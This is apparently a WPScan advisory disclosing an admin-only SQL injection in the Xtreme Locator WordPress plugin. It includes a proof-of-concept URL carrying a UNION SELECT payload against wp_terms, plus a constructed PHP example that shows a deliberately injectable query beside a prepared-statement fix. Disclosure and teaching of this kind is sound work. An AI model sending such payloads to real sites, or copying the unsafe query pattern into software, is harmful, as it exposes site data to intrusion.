Xtreme Locator Dealer Locator Plugin 1.5 – Authenticated SQL Injection


Description
Required user access: admin user.

$_GET['id'] is not escaped before it is used in a SQL query. The affected page is accessible only to admin users.
Proof of Concept
1 - Log in as an admin user;
2 - Send the following GET request:

http://www.example.com/wp-admin/admin.php?page=xtreme-locator-settings&id=0+UNION+ALL+SELECT+1%2Cslug%2Cname%2C4%2C5+FROM+wp_terms+WHERE+term_id%3D1
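The root cause described above is a query-string value concatenated straight into SQL. The following PHP is an added, constructed illustration of that pattern and of the WordPress-idiomatic fix (it is not the plugin's source, which this page does not show; the table name and column are assumptions):

```php
<?php
// Constructed illustration, not the xtremelocator plugin's actual code.
// Table name and column are assumptions for the example.

// Vulnerable pattern: the raw $_GET['id'] string is concatenated into the
// query, so anything appended to the id (e.g. a UNION clause) becomes SQL.
function xl_get_location_unsafe() {
    global $wpdb;
    $id  = $_GET['id'];                                        // unescaped user input
    $sql = "SELECT * FROM {$wpdb->prefix}xl_locations WHERE id = " . $id;
    return $wpdb->get_row( $sql );                             // injectable
}

// Hardened pattern: enforce the admin capability, coerce the id to an
// integer, and let $wpdb->prepare() bind it. The %d placeholder emits an
// integer literal, so trailing SQL in the parameter can never be parsed
// as syntax. Note that the capability check alone does not prevent the
// injection; the advisory already requires an admin account.
function xl_get_location_safe() {
    global $wpdb;
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // absint() casts to int and takes the absolute value; a non-numeric
    // string such as "0 UNION ..." collapses to 0 and is rejected here.
    $id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    if ( 0 === $id ) {
        return null;
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}xl_locations WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}
```

A code-review grep for `$wpdb->get_row(`, `get_results(` or `query(` calls whose argument is built by string concatenation with `$_GET`/`$_POST` values is a quick way to spot this class of bug in other plugins.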

Affects

Plugin xtremelocator

References

URL http://lenonleite.com.br/en/blog/2016/12/16/xtreme-locator-dealer-locator-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 124
Verified Yes
WPVDB ID 8704

Timeline

Publicly Published 2016-12-14
Added 2016-12-20
Last Updated 2016-12-20

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.